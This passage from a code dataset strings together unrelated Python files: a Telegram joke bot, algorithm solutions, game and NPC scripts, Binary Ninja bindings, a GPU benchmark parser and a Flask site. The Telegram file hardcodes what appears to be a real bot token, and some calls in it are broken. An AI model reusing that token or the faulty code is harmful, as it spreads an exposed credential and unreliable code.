ReplyKeyboardRemove,KeyboardButton\r\nbot=Bot(token=\"6093366391:AAGfDvAcI7iTVpVsoFexDIOCn4h20kQ1V-A\")\r\ndp=Dispatcher(bot)\r\n\r\nbutton1=KeyboardButton('stupid')\r\nbutton2=KeyboardButton('fat')\r\nbutton3=KeyboardButton('dumb')\r\nkeyboard1=ReplyKeyboardMarkup(resize_keyboard=True, one_time_keyboard=True).add(button1).add(button2).add(button3)\r\n\r\n@dp.message_handler()\r\nasync def kb_answer(message: types.Message):\r\n jokes = {\r\n 'stupid': [\"\"\"Yo' Mama is so stupid, she needs a recipe to make ice cubes.\"\"\",\r\n \"\"\"Yo' Mama is so stupid, she thinks DNA is the National Dyslexics Association.\"\"\"],\r\n 'fat': [\"\"\"Yo' Mama is so fat, when she goes to a restaurant, instead of a menu, she gets an estimate.\"\"\",\r\n \"\"\" Yo' Mama is so fat, when the cops see her on a street corner, they yell, \"Hey you guys, break it up!\" \"\"\"],\r\n 'dumb': [\"\"\"Yo' Mama is so dumb, when God was giving out brains, she thought they were milkshakes and asked for extra thick.\"\"\",\r\n \"\"\"Yo' Mama is so dumb, she locked her keys inside her motorcycle.\"\"\"] \r\n } \r\n if message.text == 'stupid':\r\n await message.random.choice(jokes['stupid'])\r\n elif message.text == 'fat':\r\n await message.random.choice(jokes['fat'])\r\n elif message.text == 'dumb':\r\n await message.random.choice(jokes['dumb'])\r\n \r\n\r\n\r\n\r\nexecutor.start_polling(dp)\r\n \r\n \r\n","repo_name":"nilabha2001/impressAi-exam","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3015786678","text":"def solution(begin, target, words):\n if target 
not in set(words):\n return 0\n \n conver = {}\n for a in words:\n conver.setdefault(a, [])\n for b in words:\n if convertible(a, b):\n conver[a].append(b)\n stack = [word for word in words if convertible(begin, word)]\n path = []\n answer = 100\n while stack:\n now = stack.pop()\n if now == target:\n answer = len(path)\n elif len(path) >= answer:\n path.pop()\n else:\n path.append(now)\n stack += [k for k in conver[now] if k not in path]\n if answer == 100:\n answer = 0\n return answer \n\ndef convertible(a, b):\n if sum([a_ != b_ for a_, b_ in zip(a, b)]) == 1:\n return True\n else:\n return False\n","repo_name":"hongminpark/prgrms-algorithms","sub_path":"search_dfs_bfs/lv3_단어변환.py","file_name":"lv3_단어변환.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"69851026972","text":"import json, pygame\nimport enemies as E\nimport render\nfrom render import width, height\nfrom math import degrees, radians\nfrom movement import get_deg_direction\nfrom main import calculate_damage_mod\nfrom animations import Animation\n\n\nclass Special:\n\tdef __init__(self, position, speed, direction, surface, damage=0, lifetime=0):\n\t\tself.position = position\n\t\tself.surf = surface\n\t\tself.lifetime = lifetime\n\t\tself.speed = speed\n\t\tself.direction = direction\n\t\tself.rect = pygame.Rect(self.position, (self.surf.get_width(), self.surf.get_height()))\n\t\tself.damage = damage\n\n\t\tif self.direction[0] == 0 and self.direction[1] == 0:\n\t\t\tself.direction[1] = 1\n\n\t\tself.counter = 0\n\n\n\nwith open(\"data/specials.json\") as file:\n\tspecials = json.load(file)\n\n\ndef get_special(champ_name):\n\tif champ_name == \"Knight\":\n\t\treturn Judgement\n\telif champ_name == \"Mage\":\n\t\treturn ArcaneBarrage\n\telif champ_name == \"Juggernaut\":\n\t\treturn Retaliate\n\telif champ_name == \"Assassin\":\n\t\treturn Backstab\n\telif champ_name == \"Tank\":\n\t\treturn Fortify\n\ndef get_passive(champ_name):\n\tif champ_name == \"Juggernaut\":\n\t\treturn None\n\telse:\n\t\treturn None\n\nclass Judgement(Special):\n\tid = 0\n\tname = \"Judgement\"\n\tdescription = \"The god of the kingdom is called upon, smiting the enemy.\"\n\teffect = \"If the enemy is below 10% + (caster.attack / 2) health, they are executed and the cost is refunded. 
Else, this attack deals 1.5x basic attack damage.\"\n\n\tdef __init__(self, caster):\n\t\tif caster.charge == 100:\n\t\t\tfor i in caster.enemies:\n\t\t\t\tif (abs(i.rect.center[0] - caster.rect.center[0]) < 200) and (abs(i.rect.center[1] - caster.rect.center[1] < 200)):\n\t\t\t\t\tenemy = i\n\t\t\t\t\tprint(((enemy.max_health / 10) + caster.attack * caster.attack_mod / 2 ))\n\t\t\t\t\tif enemy.health < (enemy.max_health / 10) + caster.attack * caster.attack_mod / 2:\n\t\t\t\t\t\tenemy.health = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\tcaster.charge = 0\n\t\t\t\t\t\tenemy.health -= caster.attack * caster.attack_mod * calculate_damage_mod(self, enemy, \"armour\")\n\t\t\t\telse:\n\t\t\t\t\tprint(\"No one close enough!\")\n\n\t\telse:\n\t\t\tprint(\"Not enough charge!\")\n\n\nclass ArcaneBarrage(Special):\n\tid = 1\n\tname = \"Arcane Barrage\"\n\tdescription = \"An unstoppable barrage of pure magic is hurled at the enemy.\"\n\teffect = \"Deals 1.5x the caster's magic, and buffs all the caster's magic attacks from now.\"\n\tspeed = 50\n\tsurf = pygame.Surface((120, 120))\n\tsurf.fill((0, 183, 255))\n\n\tdef __init__(self, caster):\n\t\tif caster.charge > 20:\n\t\t\tcaster.magic_mod += 0.1\n\t\t\tcaster.charge -= 20\n\t\t\tdamage = caster.magic * 1.5 * caster.magic_mod\n\t\t\tsuper().__init__((caster.position[:]), ArcaneBarrage.speed, caster.direction[:], ArcaneBarrage.surf, damage=damage,lifetime=3)\n\t\t\tself.hit = []\n\t\t\tself.target = caster.mousepos\n\t\t\tself.direction = get_deg_direction(self.rect.center, self.target)\n\t\t\tcaster.entities.append(self)\n\t\telse:\n\t\t\tprint(\"Not enough charge!\")\n\n\n\tdef update(self, dt, enemies):\n\t\tspeed = self.speed * dt / 60\n\t\t\n\t\tself.position[0] += self.direction[0] * speed\n\t\tself.position[1] += self.direction[1] * speed\n\t\tself.rect.top = self.position[1]\n\t\tself.rect.left = self.position[0]\n\n\t\tfor e in enemies:\n\t\t\tif not (e in self.hit):\n\t\t\t\tif e.rect.colliderect(self.rect):\n\t\t\t\t\tprint(e.position, self.position)\n\t\t\t\t\tself.hit.append(e)\n\t\t\t\t\te.health -= self.damage * calculate_damage_mod(self, e, \"magic\")\n\t\t\t\t\tif e.health < 0:\n\t\t\t\t\t\te.health = 0\n\nclass Retaliate(Special):\n\tid = 2\n\tname = \"Retaliate\"\n\tdescription = \"Juggernaut throws out a massive punch in a circle that deals more damage the more he's been hurt.\"\n\teffect = \"Deals 30 damage per 10% missing caster health + caster's attack.\"\n\n\tdef __init__(self, caster):\n\t\ttenpercent = caster.max_health / 10\n\t\tnum = 0\n\t\twhile tenpercent < caster.max_health:\n\t\t\tnum += 1\n\t\t\ttenpercent += caster.max_health / 10\n\n\t\tdamage = caster.attack * caster.attack_mod + (30 * num)\n\t\tself.rect = pygame.Rect((0,0), (250, 250))\n\t\tself.rect.center = caster.rect.center\n\n\t\tif caster.charge == 100:\n\t\t\tfor i in caster.enemies:\n\t\t\t\tif i.rect.colliderect(self.rect):\n\n\t\t\t\t\tcolors = [(226,34,76), (226,88,34), (226,184,34)]\t\t\n\t\t\t\t\ta = Animation(colors, 1, (self.rect.left, self.rect.top), (self.rect.width, self.rect.height), \"special\")\n\t\t\t\t\tcaster.animations.append(a)\n\t\t\t\t\tenemy = i\n\t\t\t\t\tdamage *= calculate_damage_mod(self, enemy, \"armour\")\n\t\t\t\t\tenemy.health -= damage\n\t\t\t\t\tprint(damage)\n\t\t\t\t\tcaster.charge = 0\n\t\t\t\telse:\n\t\t\t\t\tprint(\"No one close enough!\")\n\n\t\telse:\n\t\t\tprint(\"Not enough charge!\")\n\nclass Backstab:\n\tid = 3\n\tname = \"Backstab\"\n\tdescription = \"The Assassin runs behind the enemy, dealing massive damage with their 
dagger.\"\n\teffect = \"Deals 3x the attackers attack, and causes the enemy to have a 50% chance to miss next attack.\"\n\n\tdef use(caster, enemy):\n\t\tdamage = caster.attack * 3\n\t\tcaster.evasion = 0.5\n\t\tenemy.health -= damage\n\nclass Fortify:\n\tid = 4\n\tname = \"Fortify\"\n\tdescription = \"The Tank braces for impact, raising their defence to unparalleled levels.\"\n\teffect = \"For the next 2 turns, resistence is 3x, enemy attacks have 10% chance to ricochet off.\"\n\n\tdef use(caster, enemy):\n\t\tcaster.armour_mod = 3\n\t\tcaster.magic_resist_mod = 3\n\t\tcaster.ricochet_chance = 0.1\n","repo_name":"EdrinBatachu/Project-L","sub_path":"specials.py","file_name":"specials.py","file_ext":"py","file_size_in_byte":5096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31300660365","text":"import ctypes\n\n# Binary Ninja components\nimport _binaryninjacore as core\nfrom enums import MetadataType\n\n\nclass Metadata(object):\n\tdef __init__(self, value=None, signed=None, raw=None, handle=None):\n\t\tif handle is not None:\n\t\t\tself.handle = handle\n\t\telif isinstance(value, int):\n\t\t\tif signed:\n\t\t\t\tself.handle = core.BNCreateMetadataSignedIntegerData(value)\n\t\t\telse:\n\t\t\t\tself.handle = core.BNCreateMetadataUnsignedIntegerData(value)\n\t\telif isinstance(value, bool):\n\t\t\tself.handle = core.BNCreateMetadataBooleanData(value)\n\t\telif isinstance(value, str):\n\t\t\tif raw:\n\t\t\t\tbuffer = (ctypes.c_ubyte * len(value)).from_buffer_copy(value)\n\t\t\t\tself.handle = core.BNCreateMetadataRawData(buffer, len(value))\n\t\t\telse:\n\t\t\t\tself.handle = core.BNCreateMetadataStringData(value)\n\t\telif isinstance(value, float):\n\t\t\tself.handle = core.BNCreateMetadataDoubleData(value)\n\t\telif isinstance(value, list):\n\t\t\tself.handle = core.BNCreateMetadataOfType(MetadataType.ArrayDataType)\n\t\t\tfor elm in value:\n\t\t\t\tmd = Metadata(elm, signed, raw)\n\t\t\t\tcore.BNMetadataArrayAppend(self.handle, md.handle)\n\t\telif isinstance(value, dict):\n\t\t\tself.handle = core.BNCreateMetadataOfType(MetadataType.KeyValueDataType)\n\t\t\tfor elm in value:\n\t\t\t\tmd = Metadata(value[elm], signed, raw)\n\t\t\t\tcore.BNMetadataSetValueForKey(self.handle, str(elm), md.handle)\n\t\telse:\n\t\t\traise ValueError(\"List doesn't not contain type of: int, bool, str, float, list, dict\")\n\n\t@property\n\tdef value(self):\n\t\tif self.is_integer:\n\t\t\treturn int(self)\n\t\telif self.is_string or self.is_raw:\n\t\t\treturn str(self)\n\t\telif self.is_float:\n\t\t\treturn float(self)\n\t\telif self.is_boolean:\n\t\t\treturn bool(self)\n\t\telif self.is_array:\n\t\t\treturn list(self)\n\t\telif self.is_dict:\n\t\t\treturn self.get_dict()\n\t\traise TypeError()\n\n\tdef get_dict(self):\n\t\tif not self.is_dict:\n\t\t\traise TypeError()\n\t\tresult = {}\n\t\tfor key in self:\n\t\t\tresult[key] = self[key]\n\t\treturn result\n\n\t@property\n\tdef type(self):\n\t\treturn MetadataType(core.BNMetadataGetType(self.handle))\n\n\t@property\n\tdef is_integer(self):\n\t\treturn self.is_signed_integer or self.is_unsigned_integer\n\n\t@property\n\tdef is_signed_integer(self):\n\t\treturn core.BNMetadataIsSignedInteger(self.handle)\n\n\t@property\n\tdef is_unsigned_integer(self):\n\t\treturn core.BNMetadataIsUnsignedInteger(self.handle)\n\n\t@property\n\tdef is_float(self):\n\t\treturn core.BNMetadataIsDouble(self.handle)\n\n\t@property\n\tdef is_boolean(self):\n\t\treturn 
core.BNMetadataIsBoolean(self.handle)\n\n\t@property\n\tdef is_string(self):\n\t\treturn core.BNMetadataIsString(self.handle)\n\n\t@property\n\tdef is_raw(self):\n\t\treturn core.BNMetadataIsRaw(self.handle)\n\n\t@property\n\tdef is_array(self):\n\t\treturn core.BNMetadataIsArray(self.handle)\n\n\t@property\n\tdef is_dict(self):\n\t\treturn core.BNMetadataIsKeyValueStore(self.handle)\n\n\tdef remove(self, key_or_index):\n\t\tif isinstance(key_or_index, str) and self.is_dict:\n\t\t\tcore.BNMetadataRemoveKey(self.handle, key_or_index)\n\t\telif isinstance(key_or_index, int) and self.is_array:\n\t\t\tcore.BNMetadataRemoveIndex(self.handle, key_or_index)\n\t\telse:\n\t\t\traise TypeError(\"remove only valid for dict and array objects\")\n\n\tdef __len__(self):\n\t\tif self.is_array or self.is_dict or self.is_string or self.is_raw:\n\t\t\treturn core.BNMetadataSize(self.handle)\n\t\traise Exception(\"Metadata object doesn't support len()\")\n\n\tdef __iter__(self):\n\t\tif self.is_array:\n\t\t\tfor i in xrange(core.BNMetadataSize(self.handle)):\n\t\t\t\tyield Metadata(handle=core.BNMetadataGetForIndex(self.handle, i)).value\n\t\telif self.is_dict:\n\t\t\tresult = core.BNMetadataGetValueStore(self.handle)\n\t\t\ttry:\n\t\t\t\tfor i in xrange(result.contents.size):\n\t\t\t\t\tyield result.contents.keys[i]\n\t\t\tfinally:\n\t\t\t\tcore.BNFreeMetadataValueStore(result)\n\t\telse:\n\t\t\traise Exception(\"Metadata object doesn't support iteration\")\n\n\tdef __getitem__(self, value):\n\t\tif self.is_array:\n\t\t\tif not isinstance(value, int):\n\t\t\t\traise ValueError(\"Metadata object only supports integers for indexing\")\n\t\t\tif value >= len(self):\n\t\t\t\traise IndexError(\"Index value out of range\")\n\t\t\treturn Metadata(handle=core.BNMetadataGetForIndex(self.handle, value)).value\n\t\tif self.is_dict:\n\t\t\tif not isinstance(value, str):\n\t\t\t\traise ValueError(\"Metadata object only supports strings for indexing\")\n\t\t\thandle = core.BNMetadataGetForKey(self.handle, value)\n\t\t\tif handle is None:\n\t\t\t\traise KeyError(value)\n\t\t\treturn Metadata(handle=handle).value\n\n\t\traise NotImplementedError(\"Metadata object doesn't support indexing\")\n\n\tdef __str__(self):\n\t\tif self.is_string:\n\t\t\treturn core.BNMetadataGetString(self.handle)\n\t\tif self.is_raw:\n\t\t\tlength = ctypes.c_ulonglong()\n\t\t\tlength.value = 0\n\t\t\tnative_list = core.BNMetadataGetRaw(self.handle, ctypes.byref(length))\n\t\t\tout_list = []\n\t\t\tfor i in xrange(length.value):\n\t\t\t\tout_list.append(native_list[i])\n\t\t\tcore.BNFreeMetadataRaw(native_list)\n\t\t\treturn ''.join(chr(a) for a in out_list)\n\n\t\traise ValueError(\"Metadata object not a string or raw type\")\n\n\tdef __int__(self):\n\t\tif self.is_signed_integer:\n\t\t\treturn core.BNMetadataGetSignedInteger(self.handle)\n\t\tif self.is_unsigned_integer:\n\t\t\treturn core.BNMetadataGetUnsignedInteger(self.handle)\n\n\t\traise ValueError(\"Metadata object not of integer type\")\n\n\tdef __float__(self):\n\t\tif not self.is_float:\n\t\t\traise ValueError(\"Metadata object is not float type\")\n\t\treturn core.BNMetadataGetDouble(self.handle)\n\n\tdef __nonzero__(self):\n\t\tif not self.is_boolean:\n\t\t\traise ValueError(\"Metadata object is not boolean type\")\n\t\treturn core.BNMetadataGetBoolean(self.handle)\n\n\tdef __eq__(self, other):\n\t\tif isinstance(other, int) and self.is_integer:\n\t\t\treturn int(self) == other\n\t\telif isinstance(other, str) and (self.is_string or self.is_raw):\n\t\t\treturn str(self) == 
other\n\t\telif isinstance(other, float) and self.is_float:\n\t\t\treturn float(self) == other\n\t\telif isinstance(other, bool) and self.is_boolean:\n\t\t\treturn bool(self) == other\n\t\telif self.is_array and ((isinstance(other, Metadata) and other.is_array) or isinstance(other, list)):\n\t\t\tif len(self) != len(other):\n\t\t\t\treturn False\n\t\t\tfor a, b in zip(self, other):\n\t\t\t\tif a != b:\n\t\t\t\t\treturn False\n\t\t\treturn True\n\t\telif self.is_dict and ((isinstance(other, Metadata) and other.is_dict) or isinstance(other, dict)):\n\t\t\tif len(self) != len(other):\n\t\t\t\treturn False\n\t\t\tfor a, b in zip(self, other):\n\t\t\t\tif a != b or self[a] != other[b]:\n\t\t\t\t\treturn False\n\t\t\treturn True\n\t\telif isinstance(other, Metadata) and self.is_integer and other.is_integer:\n\t\t\treturn int(self) == int(other)\n\t\telif isinstance(other, Metadata) and (self.is_string or self.is_raw) and (other.is_string or other.is_raw):\n\t\t\treturn str(self) == str(other)\n\t\telif isinstance(other, Metadata) and self.is_float and other.is_float:\n\t\t\treturn float(self) == float(other)\n\t\telif isinstance(other, Metadata) and self.is_boolean and other.is_boolean:\n\t\t\treturn bool(self) == bool(other)\n\t\traise NotImplementedError()\n\n\tdef __ne__(self, other):\n\t\tif isinstance(other, int) and self.is_integer:\n\t\t\treturn int(self) != other\n\t\telif isinstance(other, str) and (self.is_string or self.is_raw):\n\t\t\treturn str(self) != other\n\t\telif isinstance(other, float) and self.is_float:\n\t\t\treturn float(self) != other\n\t\telif isinstance(other, bool):\n\t\t\treturn bool(self) != other\n\t\telif self.is_array and ((isinstance(other, Metadata) and other.is_array) or isinstance(other, list)):\n\t\t\tif len(self) != len(other):\n\t\t\t\treturn True\n\t\t\tareEqual = True\n\t\t\tfor a, b in zip(self, other):\n\t\t\t\tif a != b:\n\t\t\t\t\tareEqual = False\n\t\t\treturn not areEqual\n\t\telif self.is_dict and ((isinstance(other, Metadata) and other.is_dict) or isinstance(other, dict)):\n\t\t\tif len(self) != len(other):\n\t\t\t\treturn True\n\t\t\tfor a, b in zip(self, other):\n\t\t\t\tif a != b or self[a] != other[b]:\n\t\t\t\t\treturn True\n\t\t\treturn False\n\t\telif isinstance(other, Metadata) and self.is_integer and other.is_integer:\n\t\t\treturn int(self) != int(other)\n\t\telif isinstance(other, Metadata) and (self.is_string or self.is_raw) and (other.is_string or other.is_raw):\n\t\t\treturn str(self) != str(other)\n\t\telif isinstance(other, Metadata) and self.is_float and other.is_float:\n\t\t\treturn float(self) != float(other)\n\t\telif isinstance(other, Metadata) and self.is_boolean and other.is_boolean:\n\t\t\treturn bool(self) != bool(other)\n","repo_name":"naveenselvan/Reversing-Tools","sub_path":"tools/binaryninja/python/binaryninja/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":8109,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"28577054294","text":"#!/usr/bin/env python3\n\nimport subprocess\nimport csv\nimport sys\n\nresult = subprocess.run([\"nvprof\", \"--print-gpu-trace\", \"--csv\", sys.argv[1]], stderr=subprocess.PIPE, stdout=subprocess.PIPE)\n\n\nlines = result.stdout.split(b'\\n')\n# print(b'\\n\\n---\\n\\n'.join(lines).decode())\n\nfor i, l in enumerate(lines):\n if l.startswith(b','):\n tiramisu_exec_times = [float(num.decode()) for num in lines[i].split(b',')[1:]]\n halide_exec_times = [float(num.decode()) for num in 
lines[i+1].split(b',')[1:]]\n lines = lines[:i] + lines[i + 2:]\n break\n\nprint(b'\\n'.join(lines).decode())\n\nlines = result.stderr.split(b'\\n') \n\n\nfor i, line in enumerate(lines):\n if line.endswith(b'Profiling result:'):\n start_index = i + 1\n break\n\nreader = csv.DictReader(l.decode() for l in lines[start_index: -1])\nrows = [row for row in reader]\nunits = rows[0]\nrows = rows[1:]\n\nnb_tests = len(tiramisu_exec_times) + 1\n\nassert(len(rows) % nb_tests == 0)\n\ndef check_equal(rows, start1, start2, length):\n for i in range(length):\n if rows[start1 + i][\"Name\"] != rows[start2 + i][\"Name\"]:\n return False\n return True\n\nfor i in range(1, len(rows)//nb_tests):\n a_len = i\n b_len = len(rows)//nb_tests - a_len\n # heuristic check\n if (all(check_equal(rows, 0, j * a_len + b_len, a_len) for j in range(1, nb_tests)) and\n all(check_equal(rows, a_len, nb_tests * a_len + j * b_len, b_len) for j in range(1, nb_tests))):\n break\n\ndef median(exec_times, rows, start, length):\n sorted_indices = sorted(list(range(len(exec_times))), key=lambda i: exec_times[i])\n\n # print(sorted_indices)\n \n nb = len(exec_times)\n result = []\n first, second = sorted_indices[(nb - 1) // 2], sorted_indices[nb // 2]\n result.append(('Exec Time', (exec_times[first] + exec_times[second]) / 2))\n\n for (row1, row2) in zip(rows[start + length * first: start + length * (first + 1)], rows[start + length * second: start + length * (second + 1)]):\n result.append((row1['Name'], (float(row1['Duration']) + float(row2['Duration'])) / 2))\n total_copy = 0.0\n total_kernel = 0.0\n for label, number in result[1:]:\n if label.startswith('[CUDA memcpy'):\n total_copy += number\n else:\n total_kernel += number\n result.append(('Total Copy', total_copy))\n result.append(('Total Kernel', total_kernel))\n return result\n\ndef print_result(result):\n for label, number in result:\n print(\"{:40} {}\".format(label[:37], number))\n\n# print([row['Name'] for row in rows[:a_len]])\n# print([row['Name'] for row in rows[a_len: a_len + b_len]])\n\nprint('== tiramisu ==')\nprint_result(median(tiramisu_exec_times, rows, a_len + b_len, a_len))\nprint('== halide ==')\nprint_result(median(halide_exec_times, rows, nb_tests * a_len + b_len, b_len))\n\n# print(len(rows))\n# print(rows[0])\n# print(rows[-1])\n\n","repo_name":"Tiramisu-Compiler/tiramisu","sub_path":"utils/run_gpu_bench.py","file_name":"run_gpu_bench.py","file_ext":"py","file_size_in_byte":2895,"program_lang":"python","lang":"en","doc_type":"code","stars":876,"dataset":"github-code","pt":"32"} +{"seq_id":"28284438692","text":"# Character field ID when accessed: 100000104\n# ObjectID: 1000001\n# ParentID: 1012104\n# Object Position Y: 132\n# Object Position X: -151\n#henesys hair salon - Brittany\n\n#Eye selection:\n#20044 -bright eyes (my favorite)\n#20037 - evan eyes\n#20040 - Piercing gaze\noptions = []\n\nal = chr.getAvatarData().getAvatarLook()\n# faceColour = al.getFace() % 10 # - maybe relevant to hair but in hair it's switch up the eye's you can see\nfaceColour = 0\nif al.getGender() == 0: # Male\n #options = [20000, 20001, 20002, 20003, 20004, 20005, 20006, 20007, 20044, 20045, 20046, 20047, 20048, 20049, 20050, 20051, 20052, 20053, 20054, 20055, 20056]\n options = [20044,20000, 20001, 20002, 20003, 20004, 20005, 20006, 20007, 20008, 20009, 20010, 20011, 20012, 20013, 20014, 20015, 20016, 20017, 20018, 20019, 20020, 20021, 20022, 20023, 20024, 20025, 20026, 20027, 20028, 20029, 20030, 20031, 20032, 20036, 20037, 20040, 20043, 20047, 20050, 20051, 20056]\nelse: 
# Female\n options = [20044] # sorry ladies, i care about the boys only\n\noptions = list(map(lambda x: x + faceColour, options))\nanswer = sm.sendAskAvatar(\"Choose your new eyes!\", False, False, options)\n\n# #hair colors change for the hair!\n# eyes_Color = []\n# for i in range(5):\n# eyes_Color.append(options[answer] + i)\n#\n# options2 = list(map(lambda x: x + 0, eyes_Color))\n# answer2 = sm.sendAskAvatar(\"Choose your new color\", False, False, options2)\n#\n# if answer2 < len(options2):\n# sm.changeCharacterLook(options2[answer2])\n\nmesos = chr.getLevel() * 20000 # Taking my lvl and multiply it by 20,000 | for example lvl200 * 20,000 = 4,000,000\n\n# ----------------------------------------------------------------------------------------------------------------------\n# getting my char meso amount (Int)-\ncharMoney = chr.getMoney()\nchrDisplay = \"\" # the amount of meso the character have\ncounter = 0 # will count 3 figures for the ','\n# I created a while that going to move through the meso the char have and every 3 num's from the lowest num it's going to add \",\" and will also check it's isn\"t the first num (highest in the num)\nwhile charMoney > 0:\n counter +=1\n chrDisplay = str(charMoney % 10) + str(chrDisplay)\n\n if counter == 3:\n if (charMoney / 10) > 0:\n chrDisplay = \",\" + str(chrDisplay)\n counter = 0\n\n charMoney = (charMoney / 10)\n\n# I created a while that going to move through the meso the char have and every 3 num's from the lowest num it's going to add \",\" and will also check it's isn\"t the first num (highest in the num)\nmonDisplay = \"\"\ncont = 0\nmesos2 = mesos\nwhile mesos2 > 0:\n cont +=1\n monDisplay = str(mesos2 % 10) + str(monDisplay)\n\n if cont == 3:\n if (mesos2 / 10) > 0:\n monDisplay = \",\" + str(monDisplay)\n cont = 0\n\n mesos2 = (mesos2 / 10)\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# display the amount of meso you must pay in pretty way -\n#mesoDisplay = str(mesos/1000000) + \",000,000\"\n\nresponse = sm.sendAskYesNo(\"it's cost #r\" + monDisplay + \"#k mesos if you want to change\\r\\nYou have #b\" + str(chrDisplay) + \"#k\")\nif response:\n if sm.getMesos() > mesos:\n sm.deductMesos(mesos)\n al.setFace(options[answer])\n sm.changeCharacterLook(options[answer])\n sm.sendSayOkay(\"Enjoy the new look:D\")\n else:\n sm.sendSayOkay(\"you don't have enough meso, sorry\")\nelse:\n sm.sendSayOkay(\"you cheap Fuck!\")\n","repo_name":"doriyan13/doristory","sub_path":"scripts/npc/hair_henesys2.py","file_name":"hair_henesys2.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"30064963137","text":"\"\"\"\r\n\n\n **Mubashir** has started his journey from home. Given a string of\n`directions` (N=North, W=West, S=South, E=East), he will walk for one minute\nin each direction. 
Determine whether a set of directions will lead him back to\nthe starting position or not.\n\n### Examples\n\n back_to_home(\"EEWE\") ➞ False\n \n back_to_home(\"NENESSWW\") ➞ True\n \n back_to_home(\"NEESSW\") ➞ False\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\ndef back_to_home(directions):\n countN = 0\n countS = 0\n countE = 0\n countW = 0\n for let in directions:\n if let == 'N':\n countN = countN + 1\n if let == 'S':\n countS = countS + 1\n if let == 'E':\n countE = countE + 1 \n if let == 'W':\n countW = countW + 1\n if countN == countS and countE == countW:\n return True\n else:\n return False\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"F3M4PhqC4JdX28Qmx_4.py","file_name":"F3M4PhqC4JdX28Qmx_4.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73429017371","text":"import sys\nimport requests\nfrom xml.etree import ElementTree\n\nimport cognitiveToken\n\ndef translate(**kwargs):\n try: #make sure we have the 'text' and 'to'\n text = kwargs[\"text\"]\n to = kwargs[\"to\"]\n except: #otherwise throw an error and exit without calling the API\n sys.stderr.write(\"Must provide 'text' and 'to' as kwargs\\n\")\n return 1\n\n url = \"https://api.microsofttranslator.com/v2/http.svc/Translate\"\n\n values = {\n \"appid\": \"Bearer \" + cognitiveToken.getToken(), #need to get a token, these expire every 10 minutes\n \"text\": text,\n \"to\": to\n }\n\n r = requests.get(url, params=values)\n output = ElementTree.fromstring(r.text.encode('utf-8')) #convert xml response to text\n \n return output.text","repo_name":"chris-geelhoed/TranslateComparison","sub_path":"microsoftTrans.py","file_name":"microsoftTrans.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"9934773249","text":"import os\nimport json\nfrom flask import Flask, render_template, request, flash\nif os.path.exists(\"env.py\"):\n import env\n\"\"\" render_template: Alternative zu direktem HTML\nhier wird das Tepmlate in HTML gerändert \"\"\"\n\"\"\" request: Request is going to handle things like finding out what method\nwe used, and it will also\ncontain our form object when we've posted it. \"\"\"\n\"\"\" flash: display some feedback to the user. wie allert\nDafür brauchen wir a secret key, because Flask cryptographically\nsigns all of the messages for security purposes.\njetzt kann Flask use the key to sign the messages. 
in env.py\"\"\"\n\"\"\" env is only imported if the operating system finds an env file;\nimporting it creates __pycache__ > add that to .gitignore \"\"\"\n\n\napp = Flask(__name__)\napp.secret_key = os.environ.get(\"SECRET_KEY\")\n\"\"\" use the secret key from env \"\"\"\n\n\n@app.route(\"/\")\ndef index():\n # the render_template call renders index.html; the file lives in the templates folder\n return render_template(\"index.html\")\n\n\n@app.route(\"/about\")\ndef about():\n data = []\n with open('data/company.json', 'r') as json_data:\n \"\"\" have Python load the data from the JSON file in the data directory \"\"\"\n data = json.load(json_data)\n \"\"\" set our empty 'data' list to equal the parsed JSON data \"\"\"\n return render_template(\"about.html\", page_title=\"About\", company=data)\n\n\n\"\"\"The angle brackets pass in data from the URL path, into the view below:\nwhen a link on the About page is clicked, member_name\nis passed in here\"\"\"\n\n\n@app.route(\"/about/\")\ndef about_member(member_name):\n member = {}\n with open('data/company.json', 'r') as json_data:\n data = json.load(json_data)\n for obj in data:\n if obj['url'] == member_name:\n member = obj\n return render_template(\"member.html\", member=member)\n\n\n@app.route(\"/contact\", methods=[\"GET\", \"POST\"])\ndef contact():\n if request.method == \"POST\":\n flash(\"Thanks {}, we have received your message!\".format(\n request.form.get(\"name\")))\n \"\"\" print(request.form.get('name'))\n print(request.form['email']) \"\"\"\n \"\"\"if there isn't a 'name' or 'email' key on our\n form, instead of returning 'None', it would throw an exception.\n That's how we can access a form's data from the backend of our site.\"\"\"\n return render_template(\"contact.html\", page_title=\"Contact\")\n\n\n@app.route(\"/careers\")\ndef careers():\n return render_template(\"careers.html\", page_title=\"Careers\")\n\n\nif __name__ == \"__main__\":\n app.run(\n host=os.environ.get(\"IP\", \"0.0.0.0\"),\n port=int(os.environ.get(\"PORT\", \"5000\")),\n debug=True)\n","repo_name":"danio86/EXPLORER-THORN","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34676785215","text":"import os\nimport random\n\n# Hashes can be found here https://wiki.rage.mp/index.php?title=Peds\nwith open(os.path.normpath(\"utils/pedsToHashes.txt\"), \"r\") as file:\n pedsToHashes_ls = file.read()\n\npedsToHashes_ls = pedsToHashes_ls.split(\"\\n\")\npedsToHashes_ls = [d.split(\"=\") for d in pedsToHashes_ls]\n\npedsToHashes = {n: h.lower() for n, h in pedsToHashes_ls}\nhashesToPeds = {h.lower(): n for n, h in pedsToHashes_ls}\n\n\n# def checkValidHex(v):\n# try:\n# int(v, 16)\n# except ValueError:\n# return False\n# return True\n\n# invalid = {k:v for k,v in 